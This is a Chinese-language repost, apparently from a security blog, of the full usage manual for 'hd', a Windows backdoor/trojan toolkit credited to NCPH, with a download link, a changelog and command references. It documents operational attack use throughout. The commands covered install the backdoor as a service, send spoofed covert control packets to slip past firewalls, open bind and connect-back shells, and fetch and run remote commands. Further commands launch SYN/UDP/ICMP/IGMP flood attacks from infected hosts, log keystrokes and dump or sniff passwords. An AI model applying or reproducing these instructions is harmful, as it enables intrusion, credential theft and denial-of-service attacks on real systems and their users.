hd

鬼仔注:很早之前拿到一份,但是没怎么用过,现在有人公布了。

下载地址:http://www.ncph.net/soft/hd.rar | 备用
来源:NCPH

一. 后门主要模块介绍
==========================================================================================

1. 后门服务端
a. 后门功能
b. 后门管理
c. 文件目录操作
d. 执行程序操作
e. 系统操作
f. Shell功能
g. Proxy功能
h. DDoS功能
i. HBot功能
j. 附加功能

2. 后门客户端
a. 参数设置
b. 后门连接功能
c. 后门反连管理
d. 后门反连自动控制
e. 文件传输

3. 附加功能
a. 扫描器
b. 服务操作
c. 进程操作
d. 密码解码
e. 其他

二. 后门更新历史
==========================================================================================
2005–07-01 V1.0b5

1. 加入pulist功能。
2. 加入cleanlog功能。
3. 修正并改进了Sniffer模块。
SEQ设置成10101为不区分木马包的目标IP, 设置成10102为区分目标IP.
在装有此后门的机器上使用client功能连接其他机器时,如果使用icmp通讯。请把icmptype设成0 即 icmp_echoreply
否则会引起风暴。
4. 加入加密反连Shell功能,只能用后门的监听功能连接。
#5. 加入无连接Socks5功能。
#6. 添加了隐藏模块,能隐藏服务和进程。

2005-01-17 V1.0b4

1. 修正pwdump功能,Win2000下有效。
2. 加入clip命令查看剪切板信息。
3. 修复exe无效命令时出错问题。
4. ResultShell 支持交互模式。
5. 加入HBot模块,加入HASH和HBOT命令请看第六节详细介绍,命令行HBOT命令支持HBot测试。
6. 存储数据进行了简单加密。
7. 添加sqlcmd功能。
8. 改进了hbs端口扫描功能,为1.2版本。
9. 添加旧版hscan扫描功能,支持简单ping,name,sql,ipc扫描。

2005-01-03 V1.0b3

1. 添加了SU功能 — 实现管理员用户到任何用户权限的切换(终端下只能切换到SYSTEM)Thx bkbll。
2. 添加了自安装文件生成功能。命令为 hd -create [Newfile]
3. 修复了随机种子问题。
4. 修正GET/PUT文件传输中文件名解析问题。
5. 改进了反连Socks5与Listen连接的稳定性,修改代理转发核心超时设置为10分钟。
6. 修改了反连URL模块,支持Header数据操作和简单的Command识别。
7. 添加了PHP URL反连管理系统。

2004-12-24 V1.0b2

1. 添加hbs功能 — 命令行端口banner及HTTP版本扫描器,记录文件为hbs.txt。
2. 添加hmb功能 — 域名MX Banner查找器,记录文件为hmb.txt。
3. 添加pwdump功能。
4. 添加无连接文件传输模块。在客户端shell模式里命令为SAFEGET/SAFEPUT。
5. 添加 ! 命令于Client模块,在不退出client和不新开cmd窗口的情况下执行本地命令。
6. 改进update功能,可以自动识别原来服务的文件路径并安装。
7. 反连管理模块加入log功能,记录文件为hc.txt。
8. 修复client命令行功能TargetIP指定出错问题。 thx fatb。
9. 改进了GET/PUT文件传输。
10. 修改了后门Shell命令分类和帮助。
11. 重新编写了Readme和整理了在线帮助信息。

2004-12-15 V1.0b1

1. 修正Sniffer模块取得执行结果时无法按设定的通讯方式返回数据的低级错误,thx fatb。
2. 修正getresult功能中执行命令回显超时问题。
3. 修正Htran功能为2.30版本,支持反连和端口重用Socks5。
4. 修正pskill功能出错问题。
5. 完善proxy任务控制中的socket和线程处理。

2004-11-16 V1.0b

1. 添加URL后门模块。URL支持批处理Door Shell命令。thx bkbll。
2. 修改了后门模式,支持同时进行 bind,connectback,downloadurl任务。

2004-11-09 V0.84

1. 修改了反连后门控制功能,添加自动脚本,自动保持连接,关注IP或者后门ID等功能。
2. 添加了Send Mail 功能,thx bkbll。
3. 支持切换shell,使用return从shell中返回主界面。
4. 反连后门控制功能模块自动监听53端口。

2004-09-02 V0.83

1. 添加VNC密码解码。
2. 添加MSN密码解码。
3. 添加Enum+的功能。
4. 添加列举网络机器的功能。

2004-06-20 V0.81

1. 增加简单的后门反连控制模块在客户端功能里。
2. 修补Sniffer模块在执行命令时会造成模块僵死问题。
3. 客户端内置命令有改动。

2004-06-18 V0.80 ( 最终版???)

1. 增加Bind Server功能。
2. 完善在线shell控制功能。
3. 实现随机加密。
4. 修复Bind Shell/ConnectBack Shell 里的监听,验证密码和接受数据时的超时问题。
5. 修复kick Shell僵死问题。
6. 重写服务功能代码。

2004-06-14 V0.72 (测试版)

1. 修改了client模块 getresult/getsafe 参数判断问题。

2004-06-10 V0.71

1. 重新加入安全删除功能。
2. 加入kick Shell功能。

2004-06-07 V0.70 (无连接加密通讯版)

1. 更新客户端功能和木马协议。
2. 实现加密和hash验证。
3. 实现加密无连接CMD Shell和BackDoor Shell功能。
4. 完善后门升级功能。
5. 修改client功能,与0.60版及以下版本不兼容。
6. 客户端getresult功能里不能使用交互式命令操作(如client, cmd等)。如果要使用请用getsafe
模式。

2004-05-25 V0.60 (初步完善版)

1. 添加Sniffer密码功能。
2. 添加显示日期功能。
3. 添加抓屏功能。
4. 添加find查找文件功能。
5. 添加findpass功能。
6. 添加在线shell列表功能。
7. 后门中融合Client功能。
8. 改进Shell里执行功能的调用方式。
9. 修复多层连接时传输文件出错问题。

2004-05-21 V0.52

1. 添加文件传输功能。
2. 修复Fport功能出错问题。
3. 修改后门升级功能。

2004-05-16 V0.51

1. 添加终端安装修改端口功能。
2. 添加Pcanywhere密码文件解码功能。
3. 添加keylog功能。
4. 添加后门配置功能。
5. 添加后门升级功能。

2004-05-09 V0.50  (V0.42 二次开发版)

1. 添加Socks5代理和反向Socks5代理功能。
2. 添加随服务启动的Socks5代理和拒绝服务攻击任务功能。
3. 添加了exe功能在没有cmd.exe的时候获得执行功能并取得结果。
4. 重写后门核心模块。
5. 重写Client代码。
6. 重写Sniffer解码功能。
7. 重写后门其他很多功能代码。
8. 修改了木马协议。
9. 修改了代理和拒绝服务任务控制功能。
10. …..

2002-??-?? V0.42  (私人专用版)

1. 加强Sniffer解码功能,能捕获TCP/UDP/ICMP。
2. 封装简单木马协议,能接受shell命令。
3. 专用Client。

2002-??-?? V0.41 (2002年公开发布版)

1. 功能请看原版。

三. 命令行使用方法介绍
==========================================================================================

1. 查看帮助

使用命令: hd -help / hd -h
帮助信息:
[Usage of Backdoor:]
-create         Create AutoRun file
-install        Install Service
-remove         Remove Service
-start          Start Service
-stop           Stop Service
-update         Update Service

[Usage of Function:]
-b              Backdoor Client
-c              Config Parameter
-d              DDoS Attack
-f              Port Banner Scanner
-g              Ping/Name/SQL/IPC Scanner
-h              Help Info
-m              Command Line SendMail
-o              Show Other Function
-p              Packet Transmit
-s              Socks5 Proxy
-u              Like UNIX su Tool
-x              Sniffer

2. 后门操作

a. 后门安装

使用命令: hd -install

b. 后门启动

使用命令: hd -start

c. 停止后门

使用命令: hd -stop

d. 删除后门

使用命令: hd -remove

e. 更新后门

使用命令: hd -update [Reinstall]
参数解释:
1. 默认将自动识别原来的安装文件路径进行覆盖安装。
2. 如果选择reinstall将删除原来的服务和配置信息。
3. 如果没安装服务将自动用此路径安装服务并运行。

f. 生成自运行文件

使用命令: hd -create [Newfile]
参数解释:
1. 默认将自动识别运行的文件名后添加 _new 作为生成文件的名称。
2. Newfile为指定生成的文件名。
3. 最好压缩后再生成。
使用示例:
D:\>hd -create
Usage of Create AutoRun File: -create [Newfile]

Enter your Door Type <1.ConnectBack  2.DownloadURL 3.HBot>: 1

Enter your ConnectBack Host <IP or Domain>: 10.10.10.222

Enter your ConnectBack Port <1-65535>: 53

Enter your Sleep Time <Minute>: 60

Add Your Config Info in to The File Success.
Please use “HD_new.exe”.

3. 后门客户端功能

使用命令: hd -client | hd -b

a. 客户端使用帮助

使用命令: hd -b -h
帮助信息:
[Usage of Door Client:]
-b [Sniffer BindIP]
-b <hosts.txt|TargetIP> <Command> [Option]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 53.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
-b 192.168.0.1 “bind 99”
-b 192.168.0.1 “bind 99” -m:tcp -l:1025 -p:80 -s:192.168.0.2
-b 192.168.0.1 “connect 192.168.0.2 53”
-b hosts.txt   “hgod 192.168.0.2 80”

b. 客户端命令行使用模式(在不必要或者不能交互的情况下使用)

使用命令: hd -b <hosts.txt|TargetIP> <Command> [Option]
参数解释:
1. <host.txt|TargetIP> 为支持IP和IP列表文件两种发送形式,以实现批量处理工作。
2. <Command>为发送的命令,可为后门内置Shell里的任意一个命令及其参数。具体请查看后门Shell帮助信息。
3. SEQ 为后门协议特征包的标识,参数默认为10101,如要后门区分收到的数据包的目的IP是否为本地IP,用10102。
4. SourcePort 为发送数据包的源端口,参数为1-65535的有效端口。选为目标允许通讯的源端口可有效突破防火墙。
5. SendMode 为发送数据包的方式,参数为 TCP/UDP/ICMP 中的任一个。选为目标允许通过的协议可有效突破防火墙。
6. TargetPort 为发送数据包的目的端口,参数为1-65535的有效端口。选为目标开放的端口可有效突破防火墙。
7. SourceIP 为发送数据包的源IP,可伪造为任何IP以掩盖发送数据包的真实IP,如选为目标的可信IP可有效突破防火墙。
注:使用虚假源IP时,将视发包机器所在的网络设置,对方将可能收不到数据包。
8. ICMPType 为发送数据包的方式为ICMP时的可选项,可为任何ICMP数据包类型,选为目标允许通过的ICMP包可有效突破防火墙。
使用示例:
1. 如果要192.168.0.1机器上的后门监听99端口,发包的方式为TCP,目标开放的端口为80,用如下命令:
hd -b 192.168.0.1 “bind 99” -m:tcp -p:80
2. 如果要让hosts.txt里记录的已经装好后门的机器对192.168.0.1发起SYN拒绝服务攻击,用如下命令:
hd -b hosts.txt “hgod 192.168.0.1 80″

c. 客户端shell模式

使用命令: hd -b [Sniffer BindIP]
参数解释:
1. 多网卡的机器上使用客户端功能时可能需要指定Sniffer绑定的IP,以便Sniffer能正常工作和通讯。
2. 如果不指定IP将自动获取本机的第一个IP作为绑定IP。

d. 客户端shell模式内置命令介绍(按命令次序详细介绍)

使用命令: hd -b [Sniffer BindIP] 进入客户端shell模式。

1. ?

命令解释: 查看帮助信息
帮助信息:

?                  Shell Help
!                  Run a Local Command
A/AUTO             List and Add Auto Control
B/BIND             Bind and Listen a port
C/CLEAN            Clean the Shell log
D/DEL              Delete Auto Control
E/EXCHANGE         Exchange Mode to Shell/SafeShell/ResultShell
G/GO               Do Your Shell Command
H/HELP             Client Command Line Usage Help
K/KICK             Kick the Client
L/LIST             List Shell History
M/LISTEN           Listen for ConnectBack Shell
Q/QUIT             Exit This Program
R/RESET            Reset the Parameter of Packet to Default Value
S/SET              Set the Setting
T/TELNET           Telnet to Other Host
U/TEST             Test Target
W/WHO              Who is Connected

GB/GETBIND         Get the Target Bind Shell
GC/GETCONNECT      Get the Target Connect Back Shell
GS/GETSAFE         Get the Target Safe Shell
GR/GETRESULT       Get the Target Result Shell
GL/GETLISTEN       Get the Listen Shell
SG/SAFEGET         Safe Get File From Target
SP/SAFEPUT         Safe Put File to Target

2. !

命令解释: 运行本地命令
帮助信息:
Usage of Run Command: !<Command>
参数解释:
1. <Command>为
2. 可以在不开新cmd窗口和退出client交互模式的情况下运行本地命令。
使用示例:
1. 如果要列表D盘根目录的文件,用如下命令:
!dir d:\

3. A/AUTO

命令解释: 列举和添加连接自动控制
帮助信息:
Usage of Add Auto: a <IP|DoorID>
参数解释:
1. 如果不用参数将列举出当前的控制记录。
2. <IP|DoorID> 为该控制记录规则适用的IP或者后门ID。
3. 规则的具体内容为set命令里设置的 [a]-[f]条目。

[a] AutoLogin    =  true      // 是否自动登陆后门,默认为登陆
[b] AutoKeep     =  true      // 自动保持连接活动,默认为保持
[c] DoorScript   =  false     // 自动对后门发送脚本,默认为不发送
[d] KeepCommand  =  cd \      // 自动保持连接发送的命令,默认为”cd \”
[e] Script       =            // 自动发送脚本文件路径,默认为空
[f] LogConnect   =  true      // 记录连接信息,默认为记录

注:
a. 后门反连控制可以用于后门的反向连接和溢出的CMDShell的反向连接。
b. 如果Script设为有效的文件,将对所有的CMDShell连接起作用。
c. 如果Script设为有效的文件,同时DoorScript设为真,将对所有的后门反向连接和CMDShell连接起作用。
d. Script文件的内容为若干行命令。每个命令占用一行。
如果要对CMDShell适用的话请用cmd下能用的命令编写。
如果要对DoorShell适用的话可以用任意DoorShell支持的命令编写。
如果要同时都适用的话,请用cmd下能用的命令编写,并在文件的开头加上一个cmd和在文件的结尾加多一个exit。
e. set命令里的全局设置将对不在自动控制条目里的所有连接有效。set命令使用帮助在下面。
f. 该功能主要用于批量溢出的自动控制。
g. AutoKeep为保活连接,在不支持长连接的网络环境下使用或者防止后门反连后因超时退出(默认超时为10分钟)。
如果对DoorShell进行保活连接操作,必须把AutoLogin打开。

使用示例:
1. 如果让所有的CMD Shell连接发送httpget.txt里的脚本,用如下命令:
set script = httpget.txt
2. 如果让所有后门ID为HUC的DoorShell自动执行ddos.txt里的脚本,用如下命令:
set script = ddos.txt
set doorscript = true
auto huc
3. 如果让IP为192.168.0.1的DoorShell反连后自动保持连接,并发送命令”noop”,用如下命令:
set autologin = true
set autokeep = true
set keepcommand = noop
auto 192.168.0.1

4. B/BIND

命令解释: 监听一个端口
帮助信息:
Usage of Bind Port: b <Port>
参数解释:
1. <Port> 参数为1-65535的有效端口。
2. 该功能主要用于代替nc -l -vv -p <port> 。

5. C/CLEAN

命令解释: 清除本地Shell日志

6. D/DEL

命令解释: 删除自动控制条目
帮助信息:
Usage of Delete Auto: d <No|All>
参数解释:
1. <No> 为用Auto命令列举出所有自动控制条目中的那个ID条目编号。
2. <All> 为清除所有的自动控制条目。

7. E/EXCHANGE

命令解释: 切换Shell环境
使用帮助:
1. 当设置了targetip以后,可以用这个在后门客户端Shell/ targetip的SafeShell/ targetip的ResultShell进行切换。
2. safeshell为无连接的cmd shell,第一次在目标使用safeshell时要先输入cmd,以便后门运行一个cmd来执行命令。
同时不使用safeshell时应用exit退出。
3. resultshell为无连接的door shell。

8. G/GO

命令解释: 发送数据包
使用帮助:
1. 当设置了targetip和command以后,就可以对目标用此命令发送数据包。
2. 如果需要可以设置其他参数,参数的范围为[0]-[9]。set命令使用帮助在下面。
3. 程序设置了不能重复发送两次g命令。如果要重复发送,请随便运行一个本地Shell命令再使用g命令。

9. H/HELP

命令解释: 显示Client功能命令行使用的帮助
帮助信息:
Use “\?” for Shell Help

[Usage of Door Client:]
-b [Sniffer BindIP]
-b <hosts.txt|TargetIP> <Command> [Option]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 53.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
-b 192.168.0.1 “bind 99”
-b 192.168.0.1 “bind 99” -m:tcp -l:1025 -p:80 -s:192.168.0.2
-b 192.168.0.1 “connect 192.168.0.2 53”
-b hosts.txt   “hgod 192.168.0.2 80”

10. K/KICK

命令解释: 踢掉反连Shell
帮助信息:
Usage of Kick Shell: k <No|Client|All>
参数解释:
1. <No> 为用W/WHO命令列举出所有Shell条目中的那个ID条目编号。
2. <Client> 为踢掉所有的反连Shell。
3. <All> 为踢掉所有的Shell条目。

11. L/LIST

命令解释: 列举最近运行的80个Shell命令。

12. M/LISTEN

命令解释: 在指定端口监听后门反连
帮助信息:
Usage of Listen for ConnectBack: m <Port>
参数解释:
1. <Port> 参数为1-65535的有效端口。
2. 程序自动设置Rebind参数,重绑定该端口。
3. 该功能用于反连控制模块。
4. Set命令的[a]-[f]条目适用此端口的连接。

13. Q/QUIT

命令解释: 退出客户端Shell模式

14. R/RESET

命令解释: 重置全局参数为初始值

15. S/SET

命令解释: 设置全局参数
帮助信息:
List Setting:
编号|参数名|        |默认/当前值|
============================================
No  Parameter    Op Value
[0] TargetIP     =
[1] SourceIP     =
[2] TargetPort   =  80
[3] SourcePort   =  53
[4] Command      =
[5] Seq          =  10101
[6] SendMode     =  ICMP
[7] ICMPType     =  8
[8] GetResult    =  false
[9] Hostlist     =

[a] AutoLogin    =  true
[b] AutoKeep     =  true
[c] DoorScript   =  false
[d] KeepCommand  =  cd \
[e] Script       =
[f] LogConnect   =  true

Use “Set Parameter Op Value” or “Set No Op Value” for Set the Parameter.
Example:
Use “Set targetip to 192.168.7.1” for set the targetip, etc.
Use “Set 0 = 192.168.7.1” for set the targetip, etc.
参数解释:
1. TargetIP 要发送数据包的目的IP。
2. SourceIP 为发送数据包的源IP。可伪造为任何IP以掩盖发送数据包的真实IP,如选为目标的可信IP可有效突破防火墙。
注:使用虚假源IP时,将视发包机器所在的网络设置,对方将可能收不到数据包。
3. TargetPort 为发送数据包的目的端口。参数为1-65535的有效端口。选为目标开放的端口可有效突破防火墙。
4. SourcePort 为发送数据包的源端口,参数为1-65535的有效端口。选为目标允许通讯的源端口可有效突破防火墙。
5. Command 为后门Shell支持的任何一个命令及其参数。具体请查看后门Shell帮助信息。
6. Seq 为后门协议特征包的标识,参数默认为10101,如要后门区分收到的数据包的目的IP是否为本地IP,用10102。
7. SendMode 为发送数据包的方式,参数为 TCP/UDP/ICMP 中的任一个。选为目标允许通过的协议可有效突破防火墙。
8. ICMPType 为发送数据包的方式为ICMP时的可选项,可为任何ICMP数据包类型,选为目标允许通过的ICMP包可有效突破防火墙。
9. GetResult 为发送命令后是否要取得执行结果。
10. hostlist 指定为IP列表文件的路径。为支持IP列表文件发送形式,以实现批量处理工作。
11. AutoLogin 为是否自动登陆后门。
12. AutoKeep 为是否自动保持连接活动。
13. DoorScript 为是否自动对后门发送脚本。
14. KeepCommand 为是否自动保持连接发送的命令。
15. Script 为是否自动发送脚本文件路径。
16. LogConnect 为是否记录连接信息。
使用示例:
1. 无参数的S/SET命令将显示当前的全局设置。
2. set设置参数形式为: set 参数 Operate 值 或 set 参数ID Operate 值
3. 如设置目标IP为192.168.0.1可用 set targetip = 192.168.0.1 或 set 0 = 192.168.0.1
4. 设置SendMode为TCP用: set sendmode = tcp 或 set 6 = tcp
5. 设置Command为bind 99用: set command = bind 99 或 set 4 = bind 99 或 set 4 = “bind 99″
6. 设置Autologin为假用: set autologin = false 或 set a = false

16. T/TELNET

命令解释: 连接端口
帮助信息:
Usage of Telnet: t <targetip> <Port>
参数解释:
1. <TargetIP> 参数为要连接的IP 。
2. <Port> 参数为1-65535的有效端口。
3. 该功能主要用于代替nc <ip> <port> 。
17. U/TEST

命令解释: 测试对目标的权限
帮助信息:
Usage of Testing: u <TargetIP>
参数解释:
1. <TargetIP> 参数为要连接的IP 。
2. 如果对方安装了后门,且密码正确的话将返回成功的信息。
3. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
18. W/WHO

命令解释: 列出当前所有反连的用户和所有监听反连的端口

19. GB/GETBIND

命令解释: 获取对方的Bind Shell(监听Shell)
帮助信息:
Usage of GetBindShell: gb <TargetIP> <BindPort>
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. <BindPort> 为目标要监听的端口。
3. 发包的参数如SendMode,TargetPort等可以用Set进行设置。

20. GC/GETCONNECT

命令解释: 获取对方的ConnectBack Shell(反连Shell)
帮助信息:
Usage of GetConnectBackShell: gc <TargetIP> <ConnectBackPort> [BonnectBackIP]
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. <ConnectBackPort> 为目标要反连的端口。
3. [BonnectBackIP] 为目标要反连的IP。默认为本机的IP。
4. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
5. 如果反连的IP为本地将自动监听一个端口,如果反连的端口为53,将自动用53的反连控制来控制。

21. GS/GETSAFE

命令解释: 获取对方的无连接加密CMD Shell
帮助信息:
Usage of GetSafeShell: gs <TargetIP>
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
3. 通过正确设置参数可以突破大多数防火墙。

22. GR/GETRESULT

命令解释: 获取对方的无连接加密Door Shell
帮助信息:
Usage of GetResultShell: gr <TargetIP>
参数解释:
1. <TargetIP> 为要获取Shell的目标IP。
2. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
3. 通过正确设置参数可以突破大多数防火墙。

23. GL/GETLISTEN

命令解释: 获取监听中的反连Shell
帮助信息:
Usage of GetListen: gl <NO>
参数解释:
1. <NO> 为W/WHO命令列出的反连Shell的ID编号。
2. gl某一个shell以后,可以用return命令返回到客户端的交互Shell中。

24. SG/SAFEGET

命令解释: 无连接文件下载
帮助信息:
Usage: sg <TargetIP> <RemoteFileName> <LocalFileName>
参数解释:
1. <TargetIP> 为要获取文件的目标IP。
2. <RemoteFileName> 为要获取的远程文件路径。
3. <LocalFileName> 为本地要保存的文件路径。
4. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
5. 通过正确设置参数可以突破大多数防火墙。

25. SP/SAFEPUT

命令解释: 无连接文件上传
帮助信息:
Usage: sp <TargetIP> <RemoteFileName> <LocalFileName>
参数解释:
1. <TargetIP> 为要上传文件的目标IP。
2. <RemoteFileName> 为要保存的远程文件路径。
3. <LocalFileName> 为上传的本地文件路径。
4. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
5. 通过正确设置参数可以突破大多数防火墙。

4. 后门配置功能

使用命令: hd -config | hd -c
使用帮助:
[Usage of Config:]
-c -show
-c -type      <0,1,2,3,4>
-c -id        <DoorID>
-c -port      <BindPort>
-c -url       <DownloadURL> [SleepTime]
-c -cb        <ConnectHost> <Port> [SleepTime]
-c -hbot      <Server> <Port> <Channel> [ChannelPass]
-c -time      <SleepTime>
-c -ip        <SnifferIP>
-c -log       <logfile>
-c -ddostype  <0,1,2,3,4>
-c -ddos      <TargetHost> <TargetPort> <ThreadNum>
-c -sockstype <0,1,2,3>
-c -bind      [ReBindIP] <BindPort>
-c -connect   <ConnectHost> <ConnectPort>
-c -listen    <ConnectPort> <ListenPort>
————————————————–
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen

参数解释:
a. hd -c -show

命令解释: 查看当前配置信息

b. hd -c -type       <0,1,2,3>

命令解释: 设置当前的后门任务模式
参数解释:
1. DoorType: 0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBbot
后门类型为: 0为无任务,1为监听端口,2为反连,3为自动下载URL文件并执行其中的命令,4为HBot模块。
2. 四个后门任务可同时工作。即同时有反连,监听端口,URL模块和HBot模块。

c. hd -c -id <DoorID>

命令解释: 设置后门的ID
参数解释:
1. <DoorID> 为后门的ID名称,小于16个字符。
2. DoorID 作用为区别后门,并可用于后门反连控制的自动控制条目中。

d. hd -c -port <BindPort>

命令解释: 设置后门的工作形式为监听端口
参数解释:
1. <BindPort> 为要设置的监听端口
2. 监听端口允许多次客户端的连接。

e. hd -c -url <DownloadURL> [SleepTime]

命令解释: 配置后门的工作形式为自动下载URL并执行其中的命令
参数解释:
1. <DownloadURL> 为要下载的URL文件路径,可带端口。文件内容可为多行Door Shell命令组成。
2. [SleepTime] 为下载一次的间隔时间,默认为60分钟,单位为分钟。

f. hd -c -cb        <ConnectHost> <Port> [SleepTime]

命令解释: 设置后门的工作形式为反连
参数解释:
1. <ConnectHost> 为反连的IP或者域名。
2. <Port> 为反连的端口,参数为1-65535的有效端口,细心设置可突破一般防火墙策略。
3. [SleepTime] 为反连一次的间隔时间,默认为60分钟,单位为分钟。

g. hd -c -time <SleepTime>

命令解释: 设置后门的间隔时间
参数解释:
1. <SleepTime> 为后门反连或者下载URL的间隔时间,单位为分钟。

h. hd -c -ip

命令解释: 设置后门Sniffer绑定的IP
参数解释:
1. <SnifferIP> 为机器的其中一个IP。不能使用127.0.0.1和0.0.0.0。
2. 此功能在机器有多个网卡的情况下使用。使Sniffer模块在外网的接口绑定才能保证后门的正常工作。
3. 默认为绑定机器的第一个IP。

i. hd -c -log       <logfile>

命令解释: 设置后门日志记录文件
参数解释:
1. <logfile> 为要保存的文件路径。
2. 默认记录文件为 hdsys.dat

j. hd -c -ddostype  <0,1,2,3,4>

命令解释: 设置后门拒绝服务攻击方式
参数解释:
1. DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
攻击类型为: 0. 无攻击任务 1. SYNFlood攻击 2. UDPFlood攻击 3. ICMPFlood攻击 4. IGMPFlood攻击
2. 只支持一个攻击任务,即为最后一次设置的攻击类型生效。
3. 更多拒绝服务使用帮助请看拒绝服务功能相关介绍。

k. hd -c -ddos      <TargetHost> <TargetPort> <ThreadNum>

命令解释: 设置后门绝服务攻击参数
参数解释:
1. <TargetHost> 为要攻击的目标IP或域名。
2. <TargetPort> 为要攻击的目标端口
3. <ThreadNum> 为攻击的线程。每个线程发包数为 <1000/秒 左右,自己根据网络状况设置。
4. 设置完后请用hd -c -ddostype 设置攻击的类型,以便攻击任务生效。
5. 如果攻击类型为ICMPFlood或者IGMPFlood时,端口可以任意设置。

l. hd -c -sockstype <0,1,2,3>

命令解释: 设置后门代理服务的方式
参数解释:
1. SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
代理类型为: 0. 无代理任务 1. 监听端口代理 2. 反连代理 3.转发代理
2. 只支持一个代理任务,即为最后一次设置的代理类型生效。
3. 更多代理服务使用帮助请看代理功能相关介绍。

m. hd -c -bind      [ReBindIP] <BindPort>

命令解释: 设置后门代理服务为监听端口形式
参数解释:
1. [ReBindIP] 为设置为重用端口模式绑定的IP。不能为127.0.0.1。
2. <BindPort> 为代理监听的端口。

n. hd -c -connect   <ConnectIP> <ConnectPort>

命令解释: 设置后门代理服务为反连形式
参数解释:
1. <ConnectIP> 为要反连的IP。
2. <ConnectPort> 为要反连的端口。
3. 反连代理需要使用转发代理来接受反连才能正常工作。具体请看代理功能相关介绍。

o. hd -c -listen    <ConnectPort> <ListenPort>

命令解释: 设置后门代理服务为转发形式
参数解释:
1. <ConnectPort> 供反连代理连接的端口。
2. <ListenPort> 供SocksCap之类的代理客户端连接的端口。
3. 转发代理需要有反连代理连接才能正常工作。具体请看代理功能相关介绍。

5. 拒绝服务工具

使用命令: hd -d
帮助信息:
[Usage of DDoS Attack:]
-d <Target> <Port1,Port2,Port3…> [Option]
<Target>       Flooding Host IP|Hostname.
<Port1,…>    Flooding Host Port. Port Num must <10.

[Option:]
-a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
-b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
Set 0 to Random.
-d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
-m:Mode        Attack Mode, Use SYN/UDP/ICMP/IGMP. Default is SYN.
-p:SourcePort  Set SourcePort, Default is Random.
-s:SourceIP    Set SourceIP, Default is Random.
-t:Thread      The Threads Num for Flooding, Max is 100, Default is 5.
参数解释:
a. <Target> 为要攻击的目标IP或者域名。
b. <Port1,…> 为要攻击的目标端口,用”,”号分隔,数量不要多于10个。
c. <AttackTime> 为将攻击的时间,单位为分钟。设为0为一直攻击,默认为0。
d. <PackSize> 为发送数据包的大小,攻击模式为UDP/ICMP/IGMP时有效,默认为1000,设为0为随机大小。
e. <Delay> 为每次发包的间隔延时,攻击模式为UDP/ICMP/IGMP时有效,单位为毫秒,默认10毫秒。
f. <Mode> 为攻击的模式,有SYN/UDP/ICMP/IGMP四种攻击模式,默认为SYN Flood。
g. <SourcePort> 为发包的源端口,SYN/UDP攻击模式有效。不推荐设置。
h. <SourceIP> 为发包的源IP,所有攻击模式有效。不推荐设置。
i. <Thread> 为攻击的线程,默认为5,最大线程为100。视网络状态设定。
j. DrDos 模式已经移除,不再支持。

使用示例:
a. 对192.168.0.1的21和80端口进行SYN攻击,使用命令为:
hd -ddos 192.168.0.1 21,80
b. 对www.xxx.com的80端口进行SYN攻击,线程为20,使用的命令为:
hd -ddos www.xxx.com 80 -t:20
c. 对192.168.0.1的4000端口进行UDP攻击,命令为:
hd -ddos 192.168.0.1 4000 /m:udp

6. 端口banner扫描器

使用命令: hd -f
帮助信息:
[Usage:]
-hbs <HostName|<StartIP[-EndIP]> [Options]

[Options:]
/b             Get Banner for many ports scan
/c             Check Web Version
/n             Note Port Open
/o             Scan Port Only
/w             Scan Web Version Only
/d <Delay>     TCP connect timeout, between 1-20, default is 5
/l <Logfile>   Log file name, default is hbs.txt
/m [Ports]     Scan many ports, default will scan 35 ports
/p <Port>      Scan port, default is 25
/s <String>    Scan sensitive string
/t <Thread>    Scan thread number, between 1-1000, default is 200
参数解释:
a. <HostName|<StartIP[-EndIP]> 为要扫描的IP地址或主机名,如果要扫描一段IP地址,格式为 开始IP-结束IP。
b. /b 为多端口扫描时获取banner。
c. /c 为扫描后检查Web版本信息。
d. /n 为当目标的端口打开时,在扫描记录文件里记录此IP等信息。
e. /o 为只扫描开放的端口,不取Banner。
f. /w 为只扫描Web版本信息。
g. /d <Delay> 为建立的TCP连接的延时,范围为1-20秒,默认为5秒。
h. /l <Logfile> 为记录扫描结果信息的日志文件。默认为hbs.txt。
i. /m [Ports] 为多端口扫描,默认为扫描内置常用的35个端口。
j. /p <Port> 为要扫描的端口,默认为25。
k. /s <String> 为扫描时记录Banner包含该字符串的IP。大小写敏感。
l. /t <Thread> 为扫描的线程,范围为1-1000,默认为200。建议ADSL用户设到100以下。
使用示例:
a. 如要扫描192.168.0.1-192.168.0.254这个段的25端口,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254
b. 如果扫描192.168.0.1这个IP的25端口,扫描后检查Web版本信息,用如下命令:
hd -hbs 192.168.0.1 /c
